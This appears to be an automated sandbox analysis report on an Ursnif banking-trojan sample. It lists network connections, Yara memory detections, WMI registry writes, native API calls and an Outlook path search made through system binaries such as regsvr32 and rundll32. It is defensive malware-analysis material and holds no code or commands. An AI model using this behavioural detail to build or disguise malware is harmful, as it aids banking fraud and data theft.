Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Uses secure TLS version for HTTPS connections

Source: unknown	HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.5:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.5:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.5:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.5:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.5:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.180.206:443 -> 192.168.2.5:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.180.206:443 -> 192.168.2.5:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.5:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.5:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 195.20.250.115:443 -> 192.168.2.5:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 195.20.250.115:443 -> 192.168.2.5:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.5:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.5:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.5:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.5:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.5:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.5:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.5:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.5:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.180.206:443 -> 192.168.2.5:49789 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.180.206:443 -> 192.168.2.5:49790 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.180.206:443 -> 192.168.2.5:49783 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.180.206:443 -> 192.168.2.5:49782 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.5:49795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.5:49797 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.5:49796 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.5:49798 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.5:49799 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.5:49800 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.5:49802 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.5:49801 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.5:49826 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.5:49825 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.5:49828 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.5:49827 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.180.206:443 -> 192.168.2.5:49832 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.180.206:443 -> 192.168.2.5:49831 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.5:49836 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.5:49835 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.5:49838 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.5:49837 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.452621123.0000000002508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.340867138.0000000005278000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.358484652.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.452413152.0000000002508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.476285292.0000000004F6C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.358574602.0000000004B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.341005235.0000000005278000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.452703813.0000000002508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.358543809.0000000004B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.358526121.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.358423422.0000000004B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.358490581.0000000004B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.341021111.0000000005278000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.358326330.0000000004B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.340830267.0000000005278000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.452659371.0000000002508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.358587293.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.340789162.0000000005278000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.358440799.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.340944106.0000000005278000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.358282465.0000000004B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.358549744.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.452359075.0000000002508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.358639536.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.452511017.0000000002508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.478007505.000000000492C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.450359527.000000000507C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.340988909.0000000005278000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.358200334.0000000004B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.452558605.0000000002508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.358380196.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.452589252.0000000002508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.358524105.0000000004B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.358621357.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.340893376.0000000005278000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 5288, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 5292, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5324, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5276, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.452621123.0000000002508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.340867138.0000000005278000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.358484652.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.452413152.0000000002508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.476285292.0000000004F6C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.358574602.0000000004B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.341005235.0000000005278000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.452703813.0000000002508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.358543809.0000000004B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.358526121.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.358423422.0000000004B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.358490581.0000000004B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.341021111.0000000005278000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.358326330.0000000004B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.340830267.0000000005278000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.452659371.0000000002508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.358587293.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.340789162.0000000005278000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.358440799.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.340944106.0000000005278000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.358282465.0000000004B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.358549744.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.452359075.0000000002508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.358639536.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.452511017.0000000002508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.478007505.000000000492C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.450359527.000000000507C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.340988909.0000000005278000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.358200334.0000000004B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.452558605.0000000002508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.358380196.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.452589252.0000000002508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.358524105.0000000004B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.358621357.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.340893376.0000000005278000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 5288, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 5292, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5324, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5276, type: MEMORY

System Summary:

Writes or reads registry keys via WMI

Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Contains functionality to call native functions

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10001996 GetProcAddress,NtCreateSection,memset,		0_2_10001996
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10001A44 NtMapViewOfSection,		0_2_10001A44
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_100023A5 NtQueryVirtualMemory,		0_2_100023A5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_01405A27 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,		0_2_01405A27
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0140B1A5 NtQueryVirtualMemory,		0_2_0140B1A5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_00F05A27 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,		2_2_00F05A27
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_00F0B1A5 NtQueryVirtualMemory,		2_2_00F0B1A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04635A27 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,		3_2_04635A27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0463B1A5 NtQueryVirtualMemory,		3_2_0463B1A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04185A27 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,		5_2_04185A27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0418B1A5 NtQueryVirtualMemory,		5_2_0418B1A5

Detected potential crypto function

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10002184		0_2_10002184
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0140AF80		0_2_0140AF80
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_01403EE1		0_2_01403EE1
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0140888E		0_2_0140888E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_00F03EE1		2_2_00F03EE1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_00F0888E		2_2_00F0888E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_00F0AF80		2_2_00F0AF80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04633EE1		3_2_04633EE1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0463888E		3_2_0463888E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0463AF80		3_2_0463AF80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0418888E		5_2_0418888E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04183EE1		5_2_04183EE1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0418AF80		5_2_0418AF80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_00007FFA16A419C8		33_2_00007FFA16A419C8

Searches for the Microsoft Outlook file path

Source: C:\Windows\System32\mshta.exe

